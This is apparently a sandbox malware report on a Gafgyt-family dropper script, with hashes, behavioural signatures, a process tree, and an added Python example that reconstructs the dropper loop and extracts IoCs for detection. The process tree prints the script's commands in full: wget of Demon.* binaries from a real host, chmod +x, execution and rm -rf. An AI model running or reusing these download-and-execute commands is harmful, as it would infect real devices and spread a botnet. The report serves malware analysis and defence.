Analysis

max time kernel: 13s
max time network: 15s
platform: debian-9_armhf
resource: debian9-armhf-20240611-en
resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 19-10-2024 11:41
Static task
static1

Behavioral tasks (sample: bins.sh in every case; the results on this page come from behavioral3, whose resource matches the platform listed above)
behavioral1: debian12-armhf-20240418-en
behavioral2: debian12-mipsel-20240729-en
behavioral3: debian9-armhf-20240611-en
behavioral4: debian9-mipsbe-20240418-en
behavioral5: debian9-mipsel-20240611-en
behavioral6: ubuntu1804-amd64-20240611-en
behavioral7: ubuntu2004-amd64-20240611-en
behavioral8: ubuntu2204-amd64-20240611-en
behavioral9: ubuntu2404-amd64-20240523-en
General

Target: bins.sh
Size: 2KB
MD5: a754f4cf9d6ba2d574cd90bf04d1bc35
SHA1: b0191e89c26057b6132f3314fa685e1879c7dc62
SHA256: bf9fa0c44e56d564d8675f89533c1930b9481597d1f0d09153757d595b8ddaa0
SHA512: 600b970d65a1b8d80e0c7e9808cff50fbb610762a97d619293b859383c85ff671a28793f49d8207c984ffe113c63dabfa66d3df4d922b32c79ce707b3393162f
Malware Config

Signatures

Detected Gafgyt variant (1 IoC)
  resource          yara_rule
  /tmp/Demon.mips   family_gafgyt

File and Directory Permissions Modification (1 TTP, 12 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
  process: chmod
  pids: 668, 679, 686, 703, 718, 740, 750, 759, 775, 793, 800, 806

Executes dropped EXE (1 IoC)
  ioc               pid   process
  /tmp/Demon.mips   670   Demon.mips

Reads system routing table (1 TTP, 3 IoCs)
Gets active network interfaces from /proc virtual filesystem.
  description               ioc               process
  File opened for reading   /proc/net/route   Demon.arm6
  File opened for reading   /proc/net/route   Demon.arm4
  File opened for reading   /proc/net/route   Demon.arm5

Changes its process name (3 IoCs)
  description                                                        pid   process
  Changes the process name, possibly in an attempt to hide itself    720   Demon.arm6
  Changes the process name, possibly in an attempt to hide itself    801   Demon.arm4
  Changes the process name, possibly in an attempt to hide itself    807   Demon.arm5

Reads system network configuration (1 TTP, 3 IoCs)
Uses contents of /proc filesystem to enumerate network settings.
  description               ioc               process
  File opened for reading   /proc/net/route   Demon.arm4
  File opened for reading   /proc/net/route   Demon.arm5
  File opened for reading   /proc/net/route   Demon.arm6

System Network Configuration Discovery (1 TTP, 3 IoCs)
Adversaries may gather information about the network configuration of a system.
  pid   process
  670   Demon.mips
  672   rm
  646   wget

Writes file to tmp directory (12 IoCs)
Malware often drops required files in the /tmp directory.
  description                    ioc                 process
  File opened for modification   /tmp/Demon.mpsl     wget
  File opened for modification   /tmp/Demon.sh4      wget
  File opened for modification   /tmp/Demon.arm6     wget
  File opened for modification   /tmp/Demon.m68k     wget
  File opened for modification   /tmp/Demon.arm4     wget
  File opened for modification   /tmp/Demon.mips     wget
  File opened for modification   /tmp/Demon.x86      wget
  File opened for modification   /tmp/Demon.i686     wget
  File opened for modification   /tmp/Demon.ppc      wget
  File opened for modification   /tmp/Demon.i586     wget
  File opened for modification   /tmp/Demon.sparc    wget
  File opened for modification   /tmp/Demon.arm5     wget
Processes

The script runs the same four-step cycle for every architecture build it knows about: wget the payload from 38.123.149.216, chmod +x it, execute it, then rm -rf the file before moving to the next one. On this armhf host the arm4, arm5 and arm6 builds are the ones that ran far enough to read /proc/net/route and rename their process.

Columns: PID, image, command line, matched signatures. Indented rows are children of PID 644.

PID 644  /tmp/bins.sh   /tmp/bins.sh
  PID 646  /usr/bin/wget     wget http://38.123.149.216/Demon.mips    System Network Configuration Discovery; Writes file to tmp directory
  PID 668  /bin/chmod        chmod +x Demon.mips                      File and Directory Permissions Modification
  PID 670  /tmp/Demon.mips   ./Demon.mips                             Executes dropped EXE; System Network Configuration Discovery
  PID 672  /bin/rm           rm -rf Demon.mips                        System Network Configuration Discovery
  PID 674  /usr/bin/wget     wget http://38.123.149.216/Demon.mpsl    Writes file to tmp directory
  PID 679  /bin/chmod        chmod +x Demon.mpsl                      File and Directory Permissions Modification
  PID 680  /tmp/Demon.mpsl   ./Demon.mpsl
  PID 682  /bin/rm           rm -rf Demon.mpsl
  PID 683  /usr/bin/wget     wget http://38.123.149.216/Demon.sh4     Writes file to tmp directory
  PID 686  /bin/chmod        chmod +x Demon.sh4                       File and Directory Permissions Modification
  PID 687  /tmp/Demon.sh4    ./Demon.sh4
  PID 690  /bin/rm           rm -rf Demon.sh4
  PID 692  /usr/bin/wget     wget http://38.123.149.216/Demon.x86     Writes file to tmp directory
  PID 703  /bin/chmod        chmod +x Demon.x86                       File and Directory Permissions Modification
  PID 704  /tmp/Demon.x86    ./Demon.x86
  PID 706  /bin/rm           rm -rf Demon.x86
  PID 708  /usr/bin/wget     wget http://38.123.149.216/Demon.arm6    Writes file to tmp directory
  PID 718  /bin/chmod        chmod +x Demon.arm6                      File and Directory Permissions Modification
  PID 720  /tmp/Demon.arm6   ./Demon.arm6                             Reads system routing table; Changes its process name; Reads system network configuration
  PID 723  /bin/rm           rm -rf Demon.arm6
  PID 725  /usr/bin/wget     wget http://38.123.149.216/Demon.i686    Writes file to tmp directory
  PID 740  /bin/chmod        chmod +x Demon.i686                      File and Directory Permissions Modification
  PID 741  /tmp/Demon.i686   ./Demon.i686
  PID 744  /bin/rm           rm -rf Demon.i686
  PID 745  /usr/bin/wget     wget http://38.123.149.216/Demon.ppc     Writes file to tmp directory
  PID 750  /bin/chmod        chmod +x Demon.ppc                       File and Directory Permissions Modification
  PID 751  /tmp/Demon.ppc    ./Demon.ppc
  PID 753  /bin/rm           rm -rf Demon.ppc
  PID 754  /usr/bin/wget     wget http://38.123.149.216/Demon.i586    Writes file to tmp directory
  PID 759  /bin/chmod        chmod +x Demon.i586                      File and Directory Permissions Modification
  PID 760  /tmp/Demon.i586   ./Demon.i586
  PID 763  /bin/rm           rm -rf Demon.i586
  PID 764  /usr/bin/wget     wget http://38.123.149.216/Demon.m68k    Writes file to tmp directory
  PID 775  /bin/chmod        chmod +x Demon.m68k                      File and Directory Permissions Modification
  PID 776  /tmp/Demon.m68k   ./Demon.m68k
  PID 779  /bin/rm           rm -rf Demon.m68k
  PID 780  /usr/bin/wget     wget http://38.123.149.216/Demon.sparc   Writes file to tmp directory
  PID 793  /bin/chmod        chmod +x Demon.sparc                     File and Directory Permissions Modification
  PID 794  /tmp/Demon.sparc  ./Demon.sparc
  PID 796  /bin/rm           rm -rf Demon.sparc
  PID 797  /usr/bin/wget     wget http://38.123.149.216/Demon.arm4    Writes file to tmp directory
  PID 800  /bin/chmod        chmod +x Demon.arm4                      File and Directory Permissions Modification
  PID 801  /tmp/Demon.arm4   ./Demon.arm4                             Reads system routing table; Changes its process name; Reads system network configuration
  PID 804  /bin/rm           rm -rf Demon.arm4
  PID 805  /usr/bin/wget     wget http://38.123.149.216/Demon.arm5    Writes file to tmp directory
  PID 806  /bin/chmod        chmod +x Demon.arm5                      File and Directory Permissions Modification
  PID 807  /tmp/Demon.arm5   ./Demon.arm5                             Reads system routing table; Changes its process name; Reads system network configuration
  PID 810  /bin/rm           rm -rf Demon.arm5
  PID 811  /usr/bin/wget     wget http://38.123.149.216/Demon.arm7

PID 811 is the last command in the captured trace: no chmod, execute or rm for Demon.arm7 follows it, and it carries no "Writes file to tmp directory" match, so the Demon.arm7 cycle was never completed within the analysis window.
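An added example, not part of the sandbox report or of the sample: the script below reconstructs the dropper's per-architecture cycle from a process listing like the one above, pulls out the network and file IoCs, and flags cycles that never completed. The trace lines are constructed from the report's process tree (abridged to four of the thirteen cycles); the parsing and the detection heuristic are this example's own. It assumes the relative paths resolve under /tmp, which the report's "Writes file to tmp directory" entries support.

```python
"""Reconstruct an IoT dropper's wget/chmod/exec/rm loop from a process listing.

Added example; the process lines are constructed from the sandbox report's
process tree (PID and command line), abridged to four cycles.
"""
from collections import OrderedDict
from urllib.parse import urlparse

# Constructed from the report: one "PID<TAB>command line" per line.
TRACE = """\
644\t/tmp/bins.sh
646\twget http://38.123.149.216/Demon.mips
668\tchmod +x Demon.mips
670\t./Demon.mips
672\trm -rf Demon.mips
674\twget http://38.123.149.216/Demon.mpsl
679\tchmod +x Demon.mpsl
680\t./Demon.mpsl
682\trm -rf Demon.mpsl
797\twget http://38.123.149.216/Demon.arm4
800\tchmod +x Demon.arm4
801\t./Demon.arm4
804\trm -rf Demon.arm4
811\twget http://38.123.149.216/Demon.arm7
"""

STAGES = ("download", "chmod", "execute", "remove")


def parse_trace(text):
    """Return [(pid, argv)] in trace order."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, cmd = line.split("\t", 1)
        events.append((int(pid), cmd.split()))
    return events


def classify(argv):
    """Map one command line to (stage, artefact name), or None if it is not
    part of a download cycle (the parent /tmp/bins.sh itself, for instance)."""
    if not argv:
        return None
    prog = argv[0]
    if prog == "wget" and len(argv) >= 2:
        return "download", urlparse(argv[-1]).path.rsplit("/", 1)[-1]
    if prog == "chmod" and "+x" in argv:
        return "chmod", argv[-1]
    if prog.startswith("./"):
        return "execute", prog[2:]
    if prog == "rm" and len(argv) >= 2:
        return "remove", argv[-1]
    return None


def reconstruct(events):
    """Group stages per dropped artefact: {name: {stage: pid}}, first-seen order."""
    cycles = OrderedDict()
    for pid, argv in events:
        hit = classify(argv)
        if hit is None:
            continue
        stage, name = hit
        cycles.setdefault(name, {})[stage] = pid
    return cycles


def incomplete_cycles(cycles):
    """Artefacts whose download->chmod->execute->remove cycle did not finish
    (in the report, Demon.arm7 is fetched and nothing follows)."""
    return [n for n, st in cycles.items() if any(s not in st for s in STAGES)]


def extract_iocs(events):
    """Download hosts, full URLs and on-disk paths to block or hunt for."""
    urls = [a[-1] for _, a in events if a and a[0] == "wget"]
    hosts = sorted({urlparse(u).hostname for u in urls})
    # Assumption: the script runs from /tmp, so relative names land in /tmp.
    paths = ["/tmp/" + urlparse(u).path.rsplit("/", 1)[-1] for u in urls]
    return {"hosts": hosts, "urls": urls, "paths": paths}


def is_dropper_loop(cycles, min_complete=2):
    """Heuristic: two or more complete cycles on differently named artefacts
    is the multi-architecture dropper pattern; a lone wget is not."""
    complete = [n for n, st in cycles.items() if all(s in st for s in STAGES)]
    return len(complete) >= min_complete


if __name__ == "__main__":
    ev = parse_trace(TRACE)
    cy = reconstruct(ev)
    print("dropper loop:", is_dropper_loop(cy))
    print("incomplete:", incomplete_cycles(cy))
    print("iocs:", extract_iocs(ev))
```

Feeding it a full auditd or EDR process log instead of the constructed trace needs only a different `parse_trace`; the stage logic and the heuristic stay the same.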
Network
MITRE ATT&CK Enterprise v15
Downloads

The report does not say which of the Demon.* payloads this entry corresponds to.

Filesize: 211KB
MD5: 455a2acf75de8da6ab7c4d9564cc69f9
SHA1: 9e6016c6581289e685bcd6392bbf0bcf6b1182ff
SHA256: b08dea7aae12f248b7730af3c8f924dd67d3251d78df15a9dfb75e5d961df152
SHA512: a76b00d7f684d762ea9d5fa60d579d70b8bdfe75faedb59baae6ffb676d25d57826cde4a639c0b32dfcc3288a965591e148a489e6259910e3e0dbee90ccadeab